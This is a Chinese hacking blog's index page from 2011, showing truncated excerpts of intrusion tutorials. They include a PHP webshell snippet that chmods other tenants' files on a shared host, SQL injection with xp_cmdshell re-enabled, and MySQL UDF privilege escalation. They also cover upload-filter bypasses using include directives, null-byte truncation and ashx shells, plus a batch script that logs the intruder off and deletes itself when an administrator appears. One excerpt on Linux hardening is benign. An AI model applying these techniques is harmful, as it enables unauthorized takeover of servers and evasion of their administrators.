2011年11月25日

linux下用webshell对文件权限的修改

摘要: 当我们拥有了一个linux下的shell(服务器上多个网站)。 这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。 那么,这样的主机设置肯定是不安全的。 有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。 我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。 代码: <?php $path = stripslashes($_GET[&apos;path&apos;]); $ok = chmod ($path , 0777); if ($ok == true) echo " CH 阅读全文

posted @ 2011-11-25 12:50 0xcc 阅读(365) 评论(0) 推荐(0) 编辑

2011年11月23日

对母校.NET网站的渗透

摘要: 前几天接到高中同学的电话说中学学校网站改版了,自己买了独立服务器,服务器放在学校机房的,当然服务器位于内网环境.程序是.NET做的,让我检 测下安全性。先找注射点。经过工具加手工的查找,发现了一个地方存在注射漏洞,运气很好!放到到啊D里面提示是SA权限如图1:猜表只找到几个系统的表,尝试列目录也失败。马上放到NBSI里执行命令,失败。最后放入强悍的穿山甲进行检测,也是无法执行命令。用穿山甲检测下数据库的版本,发现是数据库是MSSQL2005的数据库。如图2:怪不得不能执行命令,MSSQL2005默认是关闭了XP_CMDSHELL的。现在我们需要开启它。;--返回正常,说明开启成功。放入工具一. 阅读全文

posted @ 2011-11-23 13:41 0xcc 阅读(423) 评论(0) 推荐(0) 编辑

2011年11月19日

关于udf提权

摘要: 一、功能:利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。 第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.. 阅读全文

posted @ 2011-11-19 10:10 0xcc 阅读(349) 评论(0) 推荐(0) 编辑

2011年11月18日

linux基本安全配置手册

摘要: 安装注意作为服务器,不安装不需要的组件,所以在选择组件的时候,不要安装服务包和桌面但需要开发工具和开发包。 以下命令等适用redhat/centos 4,51.删除系统特殊的的用户帐号:禁止所有默认的被操作系统本身启动的且不需要的帐号,当你第一次装上系统时就应该做此检查,Linux提供了各种帐号,你可能不需要,如果你不需要这个帐号,就移走它,你有的帐号越多,就越容易受到攻击。 ====================================================================== #为删除你系统上的用户,用下面的命令: [root@c1gstudio]# u 阅读全文

posted @ 2011-11-18 16:38 0xcc 阅读(336) 评论(0) 推荐(0) 编辑

上传页面无提交或上传

摘要: javascript:lbtnUpload.click();不用明小子, 直接复制到浏览器 阅读全文

posted @ 2011-11-18 16:36 0xcc 阅读(210) 评论(0) 推荐(0) 编辑

突破护卫神防火墙拦截传马

摘要: hds大牛的文章- -这个护卫神我是特别喜欢!因我做安防,不过渗透的时候会给自己造成麻烦!连续三次被这个软件拦截在门外!不能添加用户到组!纠结的狠! 护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀! 所以可以用包含的方式 asp<!--#include file="../UpLoadFile/2011091711453973499.jpg" -->php<?phpinclude"2.htm";?>用这种方式的话!就不会被杀掉了! 细心就能发现原来如此! 现在在想法子突破不能添加到组的问题!如果有兴趣的可 阅读全文

posted @ 2011-11-18 10:27 0xcc 阅读(216) 评论(0) 推荐(0) 编辑

文件上传字符截断与NC提交技巧

摘要: 在得到网站后台的账号密码 很多网站后台上传文件之后自动重名名。 这里给大家提供一种老方法了。上传文件一般是upload.asp,upfile.asp,一般可以定义文件路径,也就是uppath,而一般程序会判定后缀的,比如限定不能等于asp,aspx,asa,那么可以传cdx、cer或php(服务器支持),或者判定只能是.jpg,.gif,那么就必须使用截断方式来处理了,这儿详细说明一下。具体过程细节为:1.正常提交图片上传(最好是简单的一句话木马) 2.抓包,将刚才的包抓下来,拷贝post数据出来,存成txt 3.编辑包,用十进制工具编辑,增加00。 4.重新提交包,nc(netcat)最原始 阅读全文

posted @ 2011-11-18 10:24 0xcc 阅读(381) 评论(0) 推荐(0) 编辑

内网嗅探自我保护用到的批处理

摘要: 检测管理员上线就注销自已:@echo off :check choice /C YN /T 10 /D Y quser find "#16" && del xx.bat logoff goto check #16 每次运行这个 bat 的时候先quser 一下,看当前的会话id 是多少,然后加1 每连接一次就会加1。以上适应使用管理员帐号时。 ------------------------------------------- 下面适应使用拥有管理员权限的其他帐号: @echo off logoff 1 del log.bat logoff后面的1改成自己 阅读全文

posted @ 2011-11-18 09:55 0xcc 阅读(234) 评论(0) 推荐(0) 编辑

突破asa,cer,cdx,php,aspx 上传

摘要: 发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去, 脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System; using System.Web; using System.IO; public class Handler : IHttpHandler {publ 阅读全文

posted @ 2011-11-18 09:11 0xcc 阅读(315) 评论(0) 推荐(0) 编辑

2011年11月16日

ashx 脚本 拿shell

摘要: 该方法是利用在一些比较BT的上传上面如果ewebeditor过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System;using System.Web;using System.IO;public class Handler : IHttpHandler {public void ProcessRequest (HttpContext contex 阅读全文

posted @ 2011-11-16 22:44 0xcc 阅读(325) 评论(0) 推荐(0) 编辑

导航